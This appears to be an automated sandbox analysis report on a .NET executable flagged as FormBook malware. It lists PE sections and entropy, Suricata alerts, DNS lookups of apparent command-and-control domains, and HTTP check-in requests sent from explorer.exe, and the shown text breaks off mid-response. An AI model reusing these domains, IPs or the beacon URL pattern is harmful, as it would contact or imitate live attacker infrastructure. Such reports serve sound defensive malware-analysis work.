Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9d32c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9e000	0x441c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x9fe00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9b384	0x9b400	476cf3cc61d9fa13359c790caddaa1a3	False	0.9512945350241546	data	7.950657517538917	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x9e000	0x441c	0x4600	20d21c32b0f5ac2a964be28a22e1c3fb	False	0.9254464285714286	data	7.756637902077922	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa4000	0xc	0x200	cc0f66cd838ce1606e790105c32a219b	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x9e100	0x3da6	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9964516537827905
RT_GROUP_ICON	0xa1eb8	0x14	data	1.05
RT_VERSION	0xa1edc	0x340	data	0.45552884615384615
RT_MANIFEST	0xa222c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-05T08:54:25.745305+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49728	80	192.168.2.5	188.114.97.3
2024-08-05T08:52:00.046445+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49722	80	192.168.2.5	23.227.38.74
2024-08-05T08:51:40.721881+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49721	80	192.168.2.5	103.235.47.188
2024-08-05T08:53:22.625565+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49726	80	192.168.2.5	89.117.188.72
2024-08-05T08:49:56.887364+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49727	80	192.168.2.5	3.33.130.190
2024-08-05T08:52:41.117962+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49724	80	192.168.2.5	107.180.116.42
2024-08-05T08:52:20.643690+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49723	80	192.168.2.5	3.33.130.190

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2024 08:50:38.032771111 CEST	49718	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:50:38.037715912 CEST	80	49718	3.33.130.190	192.168.2.5
Aug 5, 2024 08:50:38.037817001 CEST	49718	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:50:38.037935019 CEST	49718	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:50:38.042781115 CEST	80	49718	3.33.130.190	192.168.2.5
Aug 5, 2024 08:50:38.504992962 CEST	80	49718	3.33.130.190	192.168.2.5
Aug 5, 2024 08:50:38.505089045 CEST	80	49718	3.33.130.190	192.168.2.5
Aug 5, 2024 08:50:38.505220890 CEST	49718	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:50:38.505220890 CEST	49718	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:50:38.510202885 CEST	80	49718	3.33.130.190	192.168.2.5
Aug 5, 2024 08:51:18.767771006 CEST	49720	80	192.168.2.5	158.69.95.141
Aug 5, 2024 08:51:18.772680998 CEST	80	49720	158.69.95.141	192.168.2.5
Aug 5, 2024 08:51:18.772753954 CEST	49720	80	192.168.2.5	158.69.95.141
Aug 5, 2024 08:51:18.772808075 CEST	49720	80	192.168.2.5	158.69.95.141
Aug 5, 2024 08:51:18.777631998 CEST	80	49720	158.69.95.141	192.168.2.5
Aug 5, 2024 08:51:19.246120930 CEST	80	49720	158.69.95.141	192.168.2.5
Aug 5, 2024 08:51:19.246150017 CEST	80	49720	158.69.95.141	192.168.2.5
Aug 5, 2024 08:51:19.246237993 CEST	49720	80	192.168.2.5	158.69.95.141
Aug 5, 2024 08:51:19.246270895 CEST	49720	80	192.168.2.5	158.69.95.141
Aug 5, 2024 08:51:19.251256943 CEST	80	49720	158.69.95.141	192.168.2.5
Aug 5, 2024 08:51:40.142982006 CEST	49721	80	192.168.2.5	103.235.47.188
Aug 5, 2024 08:51:40.147913933 CEST	80	49721	103.235.47.188	192.168.2.5
Aug 5, 2024 08:51:40.147984028 CEST	49721	80	192.168.2.5	103.235.47.188
Aug 5, 2024 08:51:40.148143053 CEST	49721	80	192.168.2.5	103.235.47.188
Aug 5, 2024 08:51:40.153009892 CEST	80	49721	103.235.47.188	192.168.2.5
Aug 5, 2024 08:51:40.637558937 CEST	49721	80	192.168.2.5	103.235.47.188
Aug 5, 2024 08:51:40.684140921 CEST	80	49721	103.235.47.188	192.168.2.5
Aug 5, 2024 08:51:40.721810102 CEST	80	49721	103.235.47.188	192.168.2.5
Aug 5, 2024 08:51:40.721880913 CEST	49721	80	192.168.2.5	103.235.47.188
Aug 5, 2024 08:51:59.578501940 CEST	49722	80	192.168.2.5	23.227.38.74
Aug 5, 2024 08:51:59.583554029 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:51:59.583703041 CEST	49722	80	192.168.2.5	23.227.38.74
Aug 5, 2024 08:51:59.583753109 CEST	49722	80	192.168.2.5	23.227.38.74
Aug 5, 2024 08:51:59.588632107 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:52:00.045173883 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:52:00.045316935 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:52:00.045327902 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:52:00.045372963 CEST	49722	80	192.168.2.5	23.227.38.74
Aug 5, 2024 08:52:00.045865059 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:52:00.045876026 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:52:00.045917988 CEST	49722	80	192.168.2.5	23.227.38.74
Aug 5, 2024 08:52:00.046005011 CEST	49722	80	192.168.2.5	23.227.38.74
Aug 5, 2024 08:52:00.046386957 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:52:00.046444893 CEST	49722	80	192.168.2.5	23.227.38.74
Aug 5, 2024 08:52:00.050720930 CEST	80	49722	23.227.38.74	192.168.2.5
Aug 5, 2024 08:52:20.172231913 CEST	49723	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:52:20.181673050 CEST	80	49723	3.33.130.190	192.168.2.5
Aug 5, 2024 08:52:20.181737900 CEST	49723	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:52:20.181860924 CEST	49723	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:52:20.186727047 CEST	80	49723	3.33.130.190	192.168.2.5
Aug 5, 2024 08:52:20.643032074 CEST	80	49723	3.33.130.190	192.168.2.5
Aug 5, 2024 08:52:20.643152952 CEST	49723	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:52:20.643636942 CEST	80	49723	3.33.130.190	192.168.2.5
Aug 5, 2024 08:52:20.643690109 CEST	49723	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:52:20.648175001 CEST	80	49723	3.33.130.190	192.168.2.5
Aug 5, 2024 08:54:03.581445932 CEST	49727	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:54:03.586292028 CEST	80	49727	3.33.130.190	192.168.2.5
Aug 5, 2024 08:54:03.586426020 CEST	49727	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:54:03.586595058 CEST	49727	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:54:03.591357946 CEST	80	49727	3.33.130.190	192.168.2.5
Aug 5, 2024 08:54:04.045094967 CEST	80	49727	3.33.130.190	192.168.2.5
Aug 5, 2024 08:54:04.045144081 CEST	80	49727	3.33.130.190	192.168.2.5
Aug 5, 2024 08:54:04.045233011 CEST	49727	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:54:04.045277119 CEST	49727	80	192.168.2.5	3.33.130.190
Aug 5, 2024 08:54:04.050189018 CEST	80	49727	3.33.130.190	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2024 08:50:38.013851881 CEST	59188	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:50:38.032052994 CEST	53	59188	1.1.1.1	192.168.2.5
Aug 5, 2024 08:50:58.512911081 CEST	65523	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:50:58.524254084 CEST	53	65523	1.1.1.1	192.168.2.5
Aug 5, 2024 08:51:18.716509104 CEST	53682	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:51:18.764108896 CEST	53	53682	1.1.1.1	192.168.2.5
Aug 5, 2024 08:51:38.969114065 CEST	51538	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:51:39.966041088 CEST	51538	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:51:40.141804934 CEST	53	51538	1.1.1.1	192.168.2.5
Aug 5, 2024 08:51:40.141834974 CEST	53	51538	1.1.1.1	192.168.2.5
Aug 5, 2024 08:51:59.550472975 CEST	59528	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:51:59.577708960 CEST	53	59528	1.1.1.1	192.168.2.5
Aug 5, 2024 08:52:20.147205114 CEST	54683	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:52:20.171333075 CEST	53	54683	1.1.1.1	192.168.2.5
Aug 5, 2024 08:52:40.598144054 CEST	63561	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:52:40.610285997 CEST	53	63561	1.1.1.1	192.168.2.5
Aug 5, 2024 08:53:01.125430107 CEST	55720	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:53:01.148277044 CEST	53	55720	1.1.1.1	192.168.2.5
Aug 5, 2024 08:53:21.675163031 CEST	55436	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:53:21.960032940 CEST	53	55436	1.1.1.1	192.168.2.5
Aug 5, 2024 08:53:42.169317007 CEST	59412	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:53:42.315227985 CEST	53	59412	1.1.1.1	192.168.2.5
Aug 5, 2024 08:54:02.888065100 CEST	60814	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:54:03.580616951 CEST	53	60814	1.1.1.1	192.168.2.5
Aug 5, 2024 08:54:25.263169050 CEST	61772	53	192.168.2.5	1.1.1.1
Aug 5, 2024 08:54:25.276827097 CEST	53	61772	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 5, 2024 08:50:38.013851881 CEST	192.168.2.5	1.1.1.1	0x4951	Standard query (0)	www.mirotcg.info	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:50:58.512911081 CEST	192.168.2.5	1.1.1.1	0x9da	Standard query (0)	www.dyahwoahjuk.store	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:18.716509104 CEST	192.168.2.5	1.1.1.1	0x18d9	Standard query (0)	www.mpo525.monster	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:38.969114065 CEST	192.168.2.5	1.1.1.1	0x7c0f	Standard query (0)	www.vicmvm649n.top	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:39.966041088 CEST	192.168.2.5	1.1.1.1	0x7c0f	Standard query (0)	www.vicmvm649n.top	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:59.550472975 CEST	192.168.2.5	1.1.1.1	0x6d0d	Standard query (0)	www.go4stores.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:52:20.147205114 CEST	192.168.2.5	1.1.1.1	0xd5bf	Standard query (0)	www.hatesa.xyz	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:52:40.598144054 CEST	192.168.2.5	1.1.1.1	0x817e	Standard query (0)	www.turbo3club.site	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:53:01.125430107 CEST	192.168.2.5	1.1.1.1	0x3258	Standard query (0)	www.agenkilat-official.space	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:53:21.675163031 CEST	192.168.2.5	1.1.1.1	0x8440	Standard query (0)	www.visualvarta.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:53:42.169317007 CEST	192.168.2.5	1.1.1.1	0xd791	Standard query (0)	www.nijssenadventures.com	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:54:02.888065100 CEST	192.168.2.5	1.1.1.1	0x1bbe	Standard query (0)	www.dnwgt80508yoec8pzq.top	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:54:25.263169050 CEST	192.168.2.5	1.1.1.1	0xeaa	Standard query (0)	www.kapalwin.live	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 5, 2024 08:50:38.032052994 CEST	1.1.1.1	192.168.2.5	0x4951	No error (0)	www.mirotcg.info	mirotcg.info		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:50:38.032052994 CEST	1.1.1.1	192.168.2.5	0x4951	No error (0)	mirotcg.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:50:38.032052994 CEST	1.1.1.1	192.168.2.5	0x4951	No error (0)	mirotcg.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:50:58.524254084 CEST	1.1.1.1	192.168.2.5	0x9da	Name error (3)	www.dyahwoahjuk.store	none	none	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:18.764108896 CEST	1.1.1.1	192.168.2.5	0x18d9	No error (0)	www.mpo525.monster		158.69.95.141	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141804934 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.vicmvm649n.top	www.baidu.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141804934 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.baidu.com	www.a.shifen.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141804934 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.a.shifen.com	www.wshifen.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141804934 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.wshifen.com		103.235.47.188	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141804934 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.wshifen.com		103.235.46.96	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141834974 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.vicmvm649n.top	www.baidu.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141834974 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.baidu.com	www.a.shifen.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141834974 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.a.shifen.com	www.wshifen.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141834974 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.wshifen.com		103.235.47.188	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:40.141834974 CEST	1.1.1.1	192.168.2.5	0x7c0f	No error (0)	www.wshifen.com		103.235.46.96	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:51:59.577708960 CEST	1.1.1.1	192.168.2.5	0x6d0d	No error (0)	www.go4stores.com	8207e1-36.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:51:59.577708960 CEST	1.1.1.1	192.168.2.5	0x6d0d	No error (0)	8207e1-36.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:51:59.577708960 CEST	1.1.1.1	192.168.2.5	0x6d0d	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:52:20.171333075 CEST	1.1.1.1	192.168.2.5	0xd5bf	No error (0)	www.hatesa.xyz	hatesa.xyz		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:52:20.171333075 CEST	1.1.1.1	192.168.2.5	0xd5bf	No error (0)	hatesa.xyz		3.33.130.190	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:52:20.171333075 CEST	1.1.1.1	192.168.2.5	0xd5bf	No error (0)	hatesa.xyz		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:52:40.610285997 CEST	1.1.1.1	192.168.2.5	0x817e	No error (0)	www.turbo3club.site	turbo3club.site		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:52:40.610285997 CEST	1.1.1.1	192.168.2.5	0x817e	No error (0)	turbo3club.site		107.180.116.42	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:53:01.148277044 CEST	1.1.1.1	192.168.2.5	0x3258	No error (0)	www.agenkilat-official.space		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:53:01.148277044 CEST	1.1.1.1	192.168.2.5	0x3258	No error (0)	www.agenkilat-official.space		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:53:21.960032940 CEST	1.1.1.1	192.168.2.5	0x8440	No error (0)	www.visualvarta.com	visualvarta.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:53:21.960032940 CEST	1.1.1.1	192.168.2.5	0x8440	No error (0)	visualvarta.com		89.117.188.72	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:53:42.315227985 CEST	1.1.1.1	192.168.2.5	0xd791	Name error (3)	www.nijssenadventures.com	none	none	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:54:03.580616951 CEST	1.1.1.1	192.168.2.5	0x1bbe	No error (0)	www.dnwgt80508yoec8pzq.top	dnwgt80508yoec8pzq.top		CNAME (Canonical name)	IN (0x0001)	false
Aug 5, 2024 08:54:03.580616951 CEST	1.1.1.1	192.168.2.5	0x1bbe	No error (0)	dnwgt80508yoec8pzq.top		3.33.130.190	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:54:03.580616951 CEST	1.1.1.1	192.168.2.5	0x1bbe	No error (0)	dnwgt80508yoec8pzq.top		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:54:25.276827097 CEST	1.1.1.1	192.168.2.5	0xeaa	No error (0)	www.kapalwin.live		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 5, 2024 08:54:25.276827097 CEST	1.1.1.1	192.168.2.5	0xeaa	No error (0)	www.kapalwin.live		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.mirotcg.info

www.mpo525.monster

www.vicmvm649n.top

www.go4stores.com

www.hatesa.xyz

www.dnwgt80508yoec8pzq.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49718	3.33.130.190	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 08:50:38.037935019 CEST	164	OUT	GET /v15n/?Yn=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXQXM/YhbITnk&mv=Y4QppplhSjwxWBd HTTP/1.1 Host: www.mirotcg.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 5, 2024 08:50:38.504992962 CEST	345	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 05 Aug 2024 06:50:38 GMT Content-Type: text/html Content-Length: 205 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 6e 3d 65 4b 4a 6f 6b 66 68 52 6c 5a 36 54 4a 6e 33 38 67 6e 73 36 56 44 36 63 79 6d 71 78 32 44 61 33 48 45 72 64 38 57 42 6a 44 51 44 4a 30 6b 5a 69 49 47 61 76 63 77 67 61 58 51 58 4d 2f 59 68 62 49 54 6e 6b 26 6d 76 3d 59 34 51 70 70 70 6c 68 53 6a 77 78 57 42 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yn=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXQXM/YhbITnk&mv=Y4QppplhSjwxWBd"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49720	158.69.95.141	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 08:51:18.772808075 CEST	166	OUT	GET /v15n/?Yn=AGM8cYat7abGFPmKwezZqVwW1aBQQM3PRq0t0OO3Vqk/+tNsWTohgGYaGZGPsfo13B1a&mv=Y4QppplhSjwxWBd HTTP/1.1 Host: www.mpo525.monster Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 5, 2024 08:51:19.246120930 CEST	258	IN	HTTP/1.1 404 Not Found content-type: text/html content-length: 151 server: Apache connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 31 35 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v15n/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49721	103.235.47.188	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 08:51:40.148143053 CEST	166	OUT	GET /v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd HTTP/1.1 Host: www.vicmvm649n.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	23.227.38.74	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 08:51:59.583753109 CEST	165	OUT	GET /v15n/?Yn=TZ7dEV+dePhm1jul6DRI/086qPMy6e3XQqPVR8kv79G9dLkwb8ABVO+elO8aT8i2Z4Zj&mv=Y4QppplhSjwxWBd HTTP/1.1 Host: www.go4stores.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 5, 2024 08:52:00.045173883 CEST	1236	IN	HTTP/1.1 403 Forbidden Date: Mon, 05 Aug 2024 06:51:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4514 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Mon, 05 Aug 2024 06:52:14 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MSBvQOPbXvNXL0hjLZMNmoNcvwIskt8wDiQH2szSVox0i1MqaL82KGN7jhvS5C1dEXSXNhqfkUPFSjdT3b9Enzb8WHzcL4mkWc1WBCZfS3jGmGgSffNEL6%2BnZ5pZ89a%2Bwcs%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=10.999918 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 8ae4dca3ec6a4291-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 